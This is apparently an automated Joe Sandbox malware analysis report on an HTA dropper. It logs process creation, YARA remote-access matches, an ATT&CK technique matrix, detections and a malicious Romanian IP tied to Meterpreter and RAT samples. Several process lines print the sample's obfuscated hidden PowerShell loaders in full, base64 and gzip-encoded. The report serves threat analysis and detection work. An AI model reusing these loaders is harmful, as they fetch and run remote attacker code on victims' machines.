          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -w hidden -e aqbmacgawwbjag4adabqahqacgbdadoaogbtagkaegblacaalqblaheaiaa0ackaewakagiapqanahaabwb3aguacgbzaggazqbsagwalgblahgazqanah0azqbsahmazqb7acqayga9acqazqbuahyaogb3agkabgbkagkacgaraccaxabzahkacwb3ag8adwa2adqaxabxagkabgbkag8adwbzafaabwb3aguacgbtaggazqbsagwaxab2adealgawafwacabvahcazqbyahmaaablagwabaauaguaeablaccafqa7acqacwa9ae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmauwb0ageacgb0aekabgbmag8aowakahmalgbgagkabablae4ayqbtaguapqakagiaowakahmalgbbahiazwb1ag0azqbuahqacwa9accalqbuag8acaagac0adwagaggaaqbkagqazqbuacaalqbjacaajgaoafsacwbjahiaaqbwahqaygbsag8aywbraf0aoga6agmacgblageadablacgakaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbtahqacgblageabqbsaguayqbkaguacgaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0akaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtacgalabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgakaaoaccajwbiadqacwbjaeeatqbkahuawabhafkaqwbbadcavgbxacsamaavagiauwbcaeqakwavageavaaraeqamqbzafyaeqbiafkayqbzahuazabsaesarqbpafyaygb1adiauqbcacsaqwbrafkasgblafeacaboaeyacabhadialwbzaeoavwb0ahyacwbeaguarqawae8adgavagyacgbpae8aegblae8aqqbpagoadqbwagwazwbmadcabqbkag0azaavaguayqbiag0avgayahmawqawadkauqbiagkadgb4agmacqbeadgakwbqaemasabrag4aoqa5ag4atwbcaekamabvaheakwbxafyawgblahkayqbyacsadqbgae4ayqbwaeoavwb2agkaagbaaeqacqaxafcavabsaduaagbhadgangbnagoazqa1adaaawbkaeiayqa3aguayqbwae4aqgbfahaavabfag4amqbuagwaswanaccakwanaccauwbhahiadgb5ahqaagbfae8auwbraewaewaxah0aega3adkazgbfaeuaoabvafaacabmafiawabwagmaewaxaccajwaraccajwb9adqazaa4ahgaeqbzageamgboahyawgbbag8azqb5agoamga1agqanabaadkanwbeadaacqblaesadqbhaeiavwbhacsadqayagiacqbzac8amgbxahyauabladgaywawageacwaxafiavab7adea
fqbxadaacqbtaeyavab4aecavgboadeanqbhagmadqbeadcaegbjahiabwbpag0atwb0afiatablae0abwbyag8aagblag0aywbiadeavwbhagmawqbwafgacabbaguavwbmahmababeahsamgb9aeuaewayah0aoqaxae0avgbyahyasga0ag0awqbtaekazabsaewatabpadaaawbqae8aeabgae4aewayah0avwbfac8anaanaccakwanaccauga3ahkalwbzafmaawbxafyacabxafoadabmadgaygbeadcalwbvaduadgbsafoamqarahmawqawaeuaagbvahuabgbhagcaaqbsadganqbaaewaawbsag4abwbrahiawabsahcanwbeae4aeqbrafiawgb6adaasabkaeyauqb1ae4azwbyahuacwbnagqacwb1afgaugbdahyargbhadgaygblahkabga4ahgabwavafgasqbwagsarab1ahyavqbyageavqb5afcauqa2ag8adabfaewamabnahcawaanaccakwanaccaoqb6afmajwanacsajwanadqazga2ageaawbaadiazqarag8acqbiaeuasaa0agqadgb7adiafqawaeyaqqbmagkazgbfahiadabgafeawgbuagwalwbpahuatqblafyadwbvahyababtadiauqa4aeiawabyagmaoqbuag0acqanaccakwanaccabaarafyajwanacsajwanafkaqgbyaeqacab5aewaqgbvacsamgbnaemamqbkaeoabqb1agkaegb4acsauqbwagsacgbzaewaygavafgavgbyafyauqbsaecacqbuahmarabbagiaywblahiauabiadkavwbmahgaygb5afuanwbmae4aqqbdahiaewaxah0atga0aemawgbaadaasgbnadaadab6aecatwbxaeyazqbrafyasabzahqargbhafqaqgbtaekawgbhahaaugbeahiazwbyacsayqbtag0aoabrahyamabrafka
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((new-object system.io.streamreader(new-object system.io.compression.gzipstream((new-object system.io.memorystream(,[system.convert]::frombase64string((('h4siamjuxgyca7vw+0/bsbd+/at+d1yvybyayudrkeivbu2qb+cqyjkqpnfpa2/sjwtvsdee0ov/froozeoaijuplgl7mjmd/eabmv2sy09qhivxcqd8+pchkn99nobi0uq+wvzkyax+ufnavjwvijzdq1wtr5jg86mje50kjba7eavnbepten1nlk'+'sarvytjeoskl{1}z79fee8oppfrxpc{1'+'}4d8xysa2nvzaoeyj25d4z97d0qekugbwa+u2bqs/2qvpk8c0as1rt{1}w0qsftxgvn15acud7zcroimotrlemoxojkmcb1wgcypxpaewlsld{2}e{2}91mvrvj4mysidrllo0kjoxfn{2}we/4'+'r7y/yskqvpwztl8bd7/u5vlz1+sy0ejuunggir85zlklnokrxrw7dnyqrzz0hjfqungrusgdsuxrcvfa8bkyn8xo/xipkduvurauywq6otel0mwx'+'9zs'+'4f6akz2e+oqbeh4dv{2}0falifertfqznl/iumevwovlm2q8bxrc9tmq'+'l+v'+'ybxdpylbu+2mc1djmuizx+qvkrylb/xvrvqlgqnsdabcerph9wfxbyu7lnacr{1}n4czz0jg0tzgoqfeqvhstfgtbsizgprdrgx+amm8qv0kycbcq8epgvfa7jq{2}40lxwlpkkqr6emwwvinl6c2d2edpubuyqckdbzygipqw'+'kbimk8{1}tyfqfloqipnsnpwlb6a8{2}nr6y4bdpilxuupztfqmvbs6h66k6zzoj6o'+'bwfubn+lzjzy20epyjzexbugodsxrgpyiyrkssd6{2}nr69kgof59'+'fq8bmwzja5zuir6winfw{2}arkap4clfsks0q{1}wjesgurwkvomb1ax8stimiu'+'d4qtvuflkwi7uepcckcdoqrbdxkvzgdfeqn2rgopt/+hby2qtuwinja+mvmtwznoksf7s9cxntvt'+'snmcnqymrgeqr4zgfu7lf2bux7anxtvsivkk{1}zo5/sqtv7gz+dvygzqp/9os6y9b6lzuenfbbrs+ibokn96whpp/ej4fuqchc466w+6gzokbvcd{1}'+'lvjtja{2}bqm5ggvzcipwb2j6ozxje9mzadsem1rftnlqwin{2}qdkxpv64{1}zurke8cagtwsdig7uzmamvft8zoqmltllxyf2xfdxrtuds47raiwlmu/d/untmixdhzedluiw9+vo9qp6ws87xmq1ym4c2o0lokbijo9hlyuftqwe9y0rdlz8fiwnnvpgi+'+'txkzko{2}i1rmg{2}zani+vmkegofxol7cotue1e{2}0dxurwry16qxodbpr9ck9n24audzholgamccueeeczjqfkpwpx9maxlocwsdtmt6gdj{2}ztfom9i+hny5grhef0dl02zk'+'m6qtfqb2tj9sbgoa'+'4dqwbrult875pvec+98efe5ofmbpib0bthvtdk{1}lnyxxjv5to89sbvjfe+cgxszedrrwndwp0evgxg9jy1gvz'+'kggcwtm//fhawpfdj8x4qxc4oeldziaxuoaltg{1}xpjux7z6nukptzn9fkiqmdpoldnsc7
ogx7smuavue+twui8imnuxmlr020puh'+'qf2xmxrlr0dtcbeskgn{1}5yzegqjl5l{1}dnkezmhdmi0uw99/m5quttrnwlv0kw+bbpsvsg0m6udttt+mfdwybjewtxn4cdw5eqswbarirbbjci{1}p2fmd8xg9keiyfafefu8/kw0'+'hsbczskruljgq/fdqfs0vfoy{2}/k{1}xyk{2}bcp//x1hlc+8xuu+{2}klnfwvf{2'+'}+vvcke/y++48xfsdoql1mzpdqea2gpfmebdgldatciv/km/l8lfz68a7lesm/y1pue6claaa{0}')-f'=','3','h')))),[system.io.compression.compressionmode]::decompress))).readtoend()))
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -w hidden -e aqbmacgawwbjag4adabqahqacgbdadoaogbtagkaegblacaalqblaheaiaa0ackaewakagiapqanahaabwb3aguacgbzaggazqbsagwalgblahgazqanah0azqbsahmazqb7acqayga9acqazqbuahyaogb3agkabgbkagkacgaraccaxabzahkacwb3ag8adwa2adqaxabxagkabgbkag8adwbzafaabwb3aguacgbtaggazqbsagwaxab2adealgawafwacabvahcazqbyahmaaablagwabaauaguaeablaccafqa7acqacwa9ae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmauwb0ageacgb0aekabgbmag8aowakahmalgbgagkabablae4ayqbtaguapqakagiaowakahmalgbbahiazwb1ag0azqbuahqacwa9accalqbuag8acaagac0adwagaggaaqbkagqazqbuacaalqbjacaajgaoafsacwbjahiaaqbwahqaygbsag8aywbraf0aoga6agmacgblageadablacgakaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbtahqacgblageabqbsaguayqbkaguacgaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0akaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtacgalabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgakaaoaccajwbiadqacwbjaeeatqbkahuawabhafkaqwbbadcavgbxacsamaavagiauwbcaeqakwavageavaaraeqamqbzafyaeqbiafkayqbzahuazabsaesarqbpafyaygb1adiauqbcacsaqwbrafkasgblafeacaboaeyacabhadialwbzaeoavwb0ahyacwbeaguarqawae8adgavagyacgbpae8aegblae8aqqbpagoadqbwagwazwbmadcabqbkag0azaavaguayqbiag0avgayahmawqawadkauqbiagkadgb4agmacqbeadgakwbqaemasabrag4aoqa5ag4atwbcaekamabvaheakwbxafyawgblahkayqbyacsadqbgae4ayqbwaeoavwb2agkaagbaaeqacqaxafcavabsaduaagbhadgangbnagoazqa1adaaawbkaeiayqa3aguayqbwae4aqgbfahaavabfag4amqbuagwaswanaccakwanaccauwbhahiadgb5ahqaagbfae8auwbraewaewaxah0aega3adkazgbfaeuaoabvafaacabmafiawabwagmaewaxaccajwaraccajwb9adqazaa4ahgaeqbzageamgboahyawgbbag8azqb5agoamga1agqanabaadkanwbeadaacqblaesadqbhaeiavwbhacsadqayagiacqbzac8amgbxahyauabladgaywawageacwaxafiavab7adea
fqbxadaacqbtaeyavab4aecavgboadeanqbhagmadqbeadcaegbjahiabwbpag0atwb0afiatablae0abwbyag8aagblag0aywbiadeavwbhagmawqbwafgacabbaguavwbmahmababeahsamgb9aeuaewayah0aoqaxae0avgbyahyasga0ag0awqbtaekazabsaewatabpadaaawbqae8aeabgae4aewayah0avwbfac8anaanaccakwanaccauga3ahkalwbzafmaawbxafyacabxafoadabmadgaygbeadcalwbvaduadgbsafoamqarahmawqawaeuaagbvahuabgbhagcaaqbsadganqbaaewaawbsag4abwbrahiawabsahcanwbeae4aeqbrafiawgb6adaasabkaeyauqb1ae4azwbyahuacwbnagqacwb1afgaugbdahyargbhadgaygblahkabga4ahgabwavafgasqbwagsarab1ahyavqbyageavqb5afcauqa2ag8adabfaewamabnahcawaanaccakwanaccaoqb6afmajwanacsajwanadqazga2ageaawbaadiazqarag8acqbiaeuasaa0agqadgb7adiafqawaeyaqqbmagkazgbfahiadabgafeawgbuagwalwbpahuatqblafyadwbvahyababtadiauqa4aeiawabyagmaoqbuag0acqanaccakwanaccabaarafyajwanacsajwanafkaqgbyaeqacab5aewaqgbvacsamgbnaemamqbkaeoabqb1agkaegb4acsauqbwagsacgbzaewaygavafgavgbyafyauqbsaecacqbuahmarabbagiaywblahiauabiadkavwbmahgaygb5afuanwbmae4aqqbdahiaewaxah0atga0aemawgbaadaasgbnadaadab6aecatwbxaeyazqbrafyasabzahqargbhafqaqgbtaekawgbhahaaugbeahiazwbyacsayqbtag0aoabrahyamabrafka
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((new-object system.io.streamreader(new-object system.io.compression.gzipstream((new-object system.io.memorystream(,[system.convert]::frombase64string((('h4siamjuxgyca7vw+0/bsbd+/at+d1yvybyayudrkeivbu2qb+cqyjkqpnfpa2/sjwtvsdee0ov/froozeoaijuplgl7mjmd/eabmv2sy09qhivxcqd8+pchkn99nobi0uq+wvzkyax+ufnavjwvijzdq1wtr5jg86mje50kjba7eavnbepten1nlk'+'sarvytjeoskl{1}z79fee8oppfrxpc{1'+'}4d8xysa2nvzaoeyj25d4z97d0qekugbwa+u2bqs/2qvpk8c0as1rt{1}w0qsftxgvn15acud7zcroimotrlemoxojkmcb1wgcypxpaewlsld{2}e{2}91mvrvj4mysidrllo0kjoxfn{2}we/4'+'r7y/yskqvpwztl8bd7/u5vlz1+sy0ejuunggir85zlklnokrxrw7dnyqrzz0hjfqungrusgdsuxrcvfa8bkyn8xo/xipkduvurauywq6otel0mwx'+'9zs'+'4f6akz2e+oqbeh4dv{2}0falifertfqznl/iumevwovlm2q8bxrc9tmq'+'l+v'+'ybxdpylbu+2mc1djmuizx+qvkrylb/xvrvqlgqnsdabcerph9wfxbyu7lnacr{1}n4czz0jg0tzgoqfeqvhstfgtbsizgprdrgx+amm8qv0kycbcq8epgvfa7jq{2}40lxwlpkkqr6emwwvinl6c2d2edpubuyqckdbzygipqw'+'kbimk8{1}tyfqfloqipnsnpwlb6a8{2}nr6y4bdpilxuupztfqmvbs6h66k6zzoj6o'+'bwfubn+lzjzy20epyjzexbugodsxrgpyiyrkssd6{2}nr69kgof59'+'fq8bmwzja5zuir6winfw{2}arkap4clfsks0q{1}wjesgurwkvomb1ax8stimiu'+'d4qtvuflkwi7uepcckcdoqrbdxkvzgdfeqn2rgopt/+hby2qtuwinja+mvmtwznoksf7s9cxntvt'+'snmcnqymrgeqr4zgfu7lf2bux7anxtvsivkk{1}zo5/sqtv7gz+dvygzqp/9os6y9b6lzuenfbbrs+ibokn96whpp/ej4fuqchc466w+6gzokbvcd{1}'+'lvjtja{2}bqm5ggvzcipwb2j6ozxje9mzadsem1rftnlqwin{2}qdkxpv64{1}zurke8cagtwsdig7uzmamvft8zoqmltllxyf2xfdxrtuds47raiwlmu/d/untmixdhzedluiw9+vo9qp6ws87xmq1ym4c2o0lokbijo9hlyuftqwe9y0rdlz8fiwnnvpgi+'+'txkzko{2}i1rmg{2}zani+vmkegofxol7cotue1e{2}0dxurwry16qxodbpr9ck9n24audzholgamccueeeczjqfkpwpx9maxlocwsdtmt6gdj{2}ztfom9i+hny5grhef0dl02zk'+'m6qtfqb2tj9sbgoa'+'4dqwbrult875pvec+98efe5ofmbpib0bthvtdk{1}lnyxxjv5to89sbvjfe+cgxszedrrwndwp0evgxg9jy1gvz'+'kggcwtm//fhawpfdj8x4qxc4oeldziaxuoaltg{1}xpjux7z6nukptzn9fkiqmdpoldnsc7
ogx7smuavue+twui8imnuxmlr020puh'+'qf2xmxrlr0dtcbeskgn{1}5yzegqjl5l{1}dnkezmhdmi0uw99/m5quttrnwlv0kw+bbpsvsg0m6udttt+mfdwybjewtxn4cdw5eqswbarirbbjci{1}p2fmd8xg9keiyfafefu8/kw0'+'hsbczskruljgq/fdqfs0vfoy{2}/k{1}xyk{2}bcp//x1hlc+8xuu+{2}klnfwvf{2'+'}+vvcke/y++48xfsdoql1mzpdqea2gpfmebdgldatciv/km/l8lfz68a7lesm/y1pue6claaa{0}')-f'=','3','h')))),[system.io.compression.compressionmode]::decompress))).readtoend()))
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

          Remote Access Functionality

Source: Yara match | File source: 00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: amsi32_4800.amsi.csv, type: OTHER
Source: Yara match | File source: 00000003.00000002.2296504585.0000000007000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2284451182.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4800, type: MEMORYSTR
MITRE ATT&CK Matrix (the number in parentheses is the count of matched signatures for that technique; techniques without a number were not observed)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (12) | DLL Side-Loading (1) | Process Injection (11) | Virtualization/Sandbox Evasion (21) | OS Credential Dumping | Security Software Discovery (1) | Remote Services | Email Collection (1) | Non-Standard Port (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | PowerShell (2) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Process Injection (11) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information (2) | Security Account Manager | Virtualization/Sandbox Evasion (21) | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Obfuscated Files or Information (1) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing (1) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | System Information Discovery (12) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label | Link
na.hta | 63% | ReversingLabs | Script-WScript.Dropper.PSRunner |
na.hta | 100% | Avira | VBS/PSRunner.VPA |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://crl.micro | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
          No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.2185051955.0000000005A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.micro | powershell.exe, 00000001.00000002.2187985444.00000000071F0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.2181031208.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2284451182.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2181031208.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2284451182.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000001.00000002.2181031208.0000000005234000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2284451182.0000000004D70000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.2185051955.0000000005A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
86.104.74.31 | unknown | Romania | | 50636 | TELE-ROM-ASstrAleeaPaciiBlB5Ap16RO | true
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1534778
              Start date and time:2024-10-16 08:09:14 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 34s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:9
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:na.hta
              Detection:MAL
              Classification:mal100.troj.evad.winHTA@7/5@0/1
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 95%
              • Number of executed functions: 16
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .hta
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target powershell.exe, PID 4800 because it is empty
              • Execution Graph export aborted for target powershell.exe, PID 4828 because it is empty
• Not all processes were analyzed; the report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: na.hta
Time | Type | Description
02:10:10 | API Interceptor | 44x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
86.104.74.31 | v65EwoFOxj.exe | Get hash | malicious | Metasploit, Meterpreter | Browse |
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TELE-ROM-ASstrAleeaPaciiBlB5Ap16RO | g4nWvGoRNZ.exe | Get hash | malicious | Remcos | Browse | 86.104.72.183
| 5046511eb489387b7a835a990ea3b36b77185f3fad905511c4bce30aa654c60b_dump.exe | Get hash | malicious | Remcos | Browse | 86.104.72.183
| aqB7l6kvXl.exe | Get hash | malicious | Remcos | Browse | 86.104.72.183
| https://libidotechnexus.com/cdn-vs/cache.php | Get hash | malicious | Unknown | Browse | 86.104.72.5
| v65EwoFOxj.exe | Get hash | malicious | Metasploit, Meterpreter | Browse | 86.104.74.31
| HQuxVxuLV.ps1 | Get hash | malicious | NetSupport RAT | Browse | 86.104.72.157
| http://wsj.pm | Get hash | malicious | NetSupport RAT | Browse | 86.104.72.157
| https://webex-install.com | Get hash | malicious | NetSupport RAT | Browse | 86.104.72.157
| 6LBI8wV2Lu | Get hash | malicious | Mirai | Browse | 86.104.79.239
                No context
                No context
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):1.1510207563435464
                Encrypted:false
